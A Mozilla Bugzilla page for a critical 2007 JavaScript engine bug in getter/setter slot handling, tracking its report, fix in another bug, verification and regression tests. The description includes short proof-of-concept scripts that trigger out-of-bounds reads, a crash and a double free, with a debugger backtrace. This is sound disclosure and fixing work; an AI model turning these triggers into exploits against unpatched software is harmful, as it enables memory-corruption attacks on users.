Last Comment Bug 367501 - getter/setter issue is not yet fixed on branches
: getter/setter issue is not yet fixed on branches
Status: VERIFIED FIXED
[sg:critical] fix in bug 366292
: verified1.8.0.10, verified1.8.1.2
Product: Core
Classification: Components
Component: JavaScript Engine (show other bugs)
: Trunk
: x86 Windows XP
: -- normal (vote)
: ---
Assigned To: general
:
:
Mentors:
Depends on: 366292
Blocks:
  Show dependency treegraph
 
Reported: 2007-01-19 07:53 PST by moz_bug_r_a4
Modified: 2007-08-08 08:08 PDT (History)
5 users (show)
dveditz: blocking1.8.1.2+
dveditz: blocking1.8.0.10+
bob: in‑testsuite+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
testcase (680 bytes, text/html)
2007-01-19 07:53 PST, moz_bug_r_a4
no flags Details
js1_5/extensions/regress-367501-01.js (2.35 KB, text/plain)
2007-02-06 20:17 PST, Bob Clary [:bc:]
no flags Details
js1_5/extensions/regress-367501-02.js (2.42 KB, text/plain)
2007-02-06 20:17 PST, Bob Clary [:bc:]
no flags Details
js1_5/extensions/regress-367501-03.js (2.41 KB, text/plain)
2007-02-06 20:18 PST, Bob Clary [:bc:]
no flags Details
js1_5/extensions/regress-367501-04.js (2.41 KB, text/plain)
2007-02-06 20:19 PST, Bob Clary [:bc:]
no flags Details

Description moz_bug_r_a4 2007-01-19 07:53:40 PST
Created attachment 252060 [details]
testcase

The patch in bug 366396 is not sufficient to fix this on branches.
CACHED_GET, CACHED_SET, NATIVE_GET, NATIVE_SET are related.

And, this could be potentially exploitable.

---
var a = { set x() {} };
a.x;

A resulting value is 2 (obj->slots[-1] == 5).

---
var a = { set x() {} };
for (var i = 0; i < 92169 - 3; ++i) a[i] = 1;
a.x;
a.x;

A resulting value is 46084 (obj->slots[-1] == 92169).

---
var a = { set x() {} };
for (var i = 0; i < 0x4bf20 - 3; ++i) a[i] = 1;
a.x;
a.x.x;

Crash (obj->slots[-1] == 0x4bf20).

---
var a = { set x() {} };
for (var i = 0; i < 0x10050c - 3; ++i) a[i] = 1;
a.x;
typeof a.x;

A resulting value is "string" (obj->slots[-1] == 0x10050c).

---
var a = { get y() {} };
a.y = 10;
for (var i = 0; i < 3; ++i) a[i] = 1;

*** glibc detected *** double free or corruption (out): 0x08a42d90 ***

#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb74d19a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb74d32b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb750587a in __fsetlocking () from /lib/tls/i686/cmov/libc.so.6
#4  0xb750bfd4 in malloc_usable_size () from /lib/tls/i686/cmov/libc.so.6
#5  0xb750c34a in free () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7e6fe75 in JS_free (cx=0x885a1f0, p=0x8a42d90) at jsapi.c:1690
#7  0xb7ee9436 in AllocSlots (cx=0x885a1f0, slots=0x8a42d94, nslots=8)
    at jsobj.c:2280
#8  0xb7eeb140 in js_AllocSlot (cx=0x885a1f0, obj=0x8a80b30, slotp=0xbfa80e04)
    at jsobj.c:2733
#9  0xb7f26a7c in js_AddScopeProperty (cx=0x885a1f0, scope=0x8a29d38, id=5,
    getter=0, setter=0, slot=4294967295, attrs=1, flags=0, shortid=0)
    at jsscope.c:1134
#10 0xb7eee70a in js_SetProperty (cx=0x885a1f0, obj=0x8a80b30, id=5,
    vp=0xbfa815f0) at jsobj.c:3699
#11 0xb7eca7e2 in js_Interpret (cx=0x885a1f0, pc=0x88017ad "8\002)",
    result=0xbfa81990) at jsinterp.c:3737
#12 0xb7eb94f5 in js_Execute (cx=0x885a1f0, chain=0x8a80b48, script=0x8801740,
    down=0x81baff8, flags=32, result=0xbfa81b70) at jsinterp.c:1654
#13 0xb7ee5e07 in obj_eval (cx=0x885a1f0, obj=0x8a94418, argc=1,
    argv=0x81bb078, rval=0xbfa81b70) at jsobj.c:1360
#14 0xb7eb8927 in js_Invoke (cx=0x885a1f0, argc=1, flags=0) at jsinterp.c:1396
---Type <return> to continue, or q <return> to quit---
Comment 1 moz_bug_r_a4 2007-01-19 08:15:07 PST
SeaMonkey 1.1 has been released with this bug.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070111 SeaMonkey/1.1
Comment 2 Blake Kaplan (:mrbkap) 2007-01-19 09:18:27 PST
Bug 366292 was never checked into the 1.8 branch...
Comment 3 Daniel Veditz [:dveditz] 2007-01-19 10:16:44 PST
Is this a duplicate of bug 366292 then, or is that just a prerequisite to fixing this?
Comment 4 Daniel Veditz [:dveditz] 2007-01-19 10:21:51 PST
(In reply to comment #1)
> SeaMonkey 1.1 has been released with this bug.

The seamonkey team decided to release the much delayed 1.1 now rather than wait for 1.8.1.2 and plan to catch up with a subsequent security update.
Comment 5 Jay Patel [:jay] 2007-01-22 15:15:01 PST
brendan:  Is this a dup of bug 366292?  If so, we need to mark it so and remove the blocking flags (since we already approved and landed the fixes in that other bug).  Let us know... thanks!
Comment 6 moz_bug_r_a4 2007-01-22 20:57:47 PST
This has been fixed in bug 366292.

Tested with:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070122
BonEcho/2.0.0.2pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070122
Firefox/1.5.0.10pre
Comment 7 Bob Clary [:bc:] 2007-02-06 20:17:04 PST
Created attachment 254253 [details]
js1_5/extensions/regress-367501-01.js
Comment 8 Bob Clary [:bc:] 2007-02-06 20:17:59 PST
Created attachment 254254 [details]
js1_5/extensions/regress-367501-02.js
Comment 9 Bob Clary [:bc:] 2007-02-06 20:18:38 PST
Created attachment 254255 [details]
js1_5/extensions/regress-367501-03.js
Comment 10 Bob Clary [:bc:] 2007-02-06 20:19:15 PST
Created attachment 254256 [details]
js1_5/extensions/regress-367501-04.js
Comment 11 Bob Clary [:bc:] 2007-02-09 07:52:10 PST
verified fixed 1.8.0.10, 1.8.1.2 2007-02-08 windows/mac*/linux
Comment 12 Bob Clary [:bc:] 2007-02-19 13:32:29 PST
verified fixed 2007-02-17 1.9.0 windows/mac*/linux
Comment 13 Bob Clary [:bc:] 2007-08-08 08:08:05 PDT
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-01.js,v  <--  regress-367501-01.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-02.js,v  <--  regress-367501-02.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-03.js,v  <--  regress-367501-03.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-04.js,v  <--  regress-367501-04.js
initial revision: 1.1

Note You need to log in before you can comment on or make changes to this bug.